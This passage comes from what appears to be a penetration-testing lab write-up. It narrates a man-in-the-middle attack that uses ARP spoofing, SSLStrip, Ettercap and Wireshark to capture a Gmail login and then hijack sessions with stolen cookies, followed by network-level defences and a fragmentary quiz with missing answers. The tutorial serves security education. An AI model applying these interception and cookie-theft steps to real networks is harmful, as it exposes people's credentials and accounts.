Check whynohttps.com (by Scott Helme and Troy Hunt) to see the
world's most popular sites that don't use HTTPS. In September
2018 a few of these were bbc.com, espn.com, alibaba.com and
baidu.com). This is what an insecure website looks like in the
modern version of Chrome:
Anyways, back to our Gmail browsing. On the HTTP Gmail website,
I'll enter my email address and a fake password 12345:
 This obviously didn't work, since that isn't my real password
and Gmail returned an error stating invalid credentials.
However, for what I'm demonstrating here, this is enough.

Attacker's side
Switching back to the attacker's side, let's see what we can see
of the user's browsing actions. Ettercap monitors the network
traffic and logs interesting parts of the communication to the
screen. As we can see from the image below, Ettercap saw the
HTTP-POST request with the login details sent to the Gmail
server:

I highlighted my email address and the entered password 12345 as

well. Ettercap supports many protocols besides HTTP so this log
would be interesting to follow. However, running Wireshark as an
attacker would allow us to see the contents of all network
traffic. In the image below I highlighted the username and
password from the HTTP-POST request:

The highlighted Wireshark packet clearly shows the victim's IP

address as the source. I filtered the network capture to display
only HTTP-traffic, but being man-in-the-middle we would be able
to see traffic from all protocols. We're able to see the is
because the client sends his data over HTTP, as forced by
SSLStrip. If the client would communicate via HTTPS, we would
see nothing but encrypted data like in the image below:
 Cookie stealing
When I give a live demonstration of ARP spoofing, I always take
it a little further after the attack succeeded. Using the
information from the Wireshark network capture I can steal the
victim's cookie when he's browsing a website. Using this cookie
I then take over the victim's session and perform actions only
he is allowed to do on that site, like changing his profile
picture and description. If that user would have been a website
administrator, a hacker may do a lot more damage.

Prevention
ARP Spoofing is one way to perform a man-in-the-middle attack.
However, there are a few security countermeasures to protect you
against this. I've divided the preventive measures into 3
categories: the network, the website and the user.

Network / infrastructure
From a network perspective there are a few things that can be
done to prevent ARP spoofing:

ARP is a protocol that relies on IPv4. In IPv6 ARP has been

replaced by the Neighbor Discovery Protocol (NDP), however the
adoption rate of IPv6 is still relatively low. The security
extension of this protocol (Secure Neighbor Discovery or SEND)
uses cryptography to ensure that the claimed source of an NDP
message is the owner of the claimed address.
Most modern switches come with an ARP spoofing protection
feature that can be enabled to prevent this attack.
Creating a static ARP entry in your server can help reduce the
risk of spoofing. If you have two hosts that regularly
communicate with one another, setting up a static ARP entry
creates a permanent entry in your ARP cache that can help add a
layer of protection from spoofing.
----------------------------------------------------------------
----------------------------------------------------------------
--------------------------------------------------------------
Answer the questions below
The victim is running Windows 7 on a machine with

Correct Answer
The attacker will be running Kali Linux with

Correct Answer
We first want to know the details of our own network interface
via the

Correct Answer
We can see the gateway's

Correct Answer
Hint
In the extended menu,

Correct Answer
Hint
The address in the address-bar shows
HTTP

Task 7 note

https://ko-fi.com/penetrationtesting

Thank you for completing this room and we hope for your
support I hope you are of good use, and I hope you will support
me

-----------------------

Written by

facebook